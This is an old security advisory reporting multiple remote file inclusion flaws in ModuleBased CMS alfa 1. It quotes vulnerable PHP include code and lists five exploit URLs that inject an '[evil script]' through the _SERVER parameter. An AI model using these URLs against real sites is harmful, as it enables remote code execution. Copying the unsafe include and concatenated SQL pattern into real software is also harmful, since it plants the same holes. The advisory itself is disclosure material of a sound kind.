ModuleBased CMS alfa 1 Multiple Remote File Inclusion

2006-09-01T00:00:00
ID SECURITYVULNS:DOC:14117
Type securityvulns
Reporter Securityvulns
Modified 2006-09-01T00:00:00

Description

+ModuleBased CMS(MBCMS) multiple remote file Inclusion +discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and customability. It is designed +for PHP/MySQL and it is easy to write new modules or templates to suit a particular website. +version:alfa 1 +vendor site:http://sourceforge.net/projects/mbcms/ + +discovered by: ScorpinO +location:IRAN/ANZALI +sites: WwW.ScorpinO.NeT Www.deltahacking.iR +email:amir.scorpino@yahoo.com +special tnx to:Dr.trojan,HIV++,D_7J,Vampire,...... + +discovered in avatar.php archive.class.php login.php profile.class.php process.php + + /admin/avatar.php

<?php include_once($_SERVER[DOCUMENT_ROOT]."/libs/profile.class.php"); include($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); $profile = new Profile(); $q = mysql_query("SELECT avatar FROM users WHERE username='".$_SESSION['username']."'"); $r = mysql_fetch_assoc($q);

?> +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/libs/archive.class.php

<?php include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); class Archive{ function AllArchives(){ $q = mysql_query("SELECT * FROM posts") or die (mysql_error()); while ($r = mysql_fetch_assoc($q)){ if($r['topic'] == 1) $topic = "News"; if($r['topic'] == 2) $topic = "Articles"; echo $topic; $q = mysql_query("SELECT * FROM posts WHERE topic='".$r['topic']."'") or die (mysql_error()); while($r_posts = mysql_fetch_assoc($q)) echo $r_posts['post']; } } } ?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /libs/login.php

<?php if($_POST['login']){ include_once($_SERVER[DOCUMENT_ROOT]."/libs/user.class.php"); $user = new User(); $user->login($_POST['username'], $_POST['pass']); } ?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /libs/profiles.class.php

<?php include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); ?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /libs/profile/proccess.php

<?php include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); ?>

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +exploit: + +http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script]

++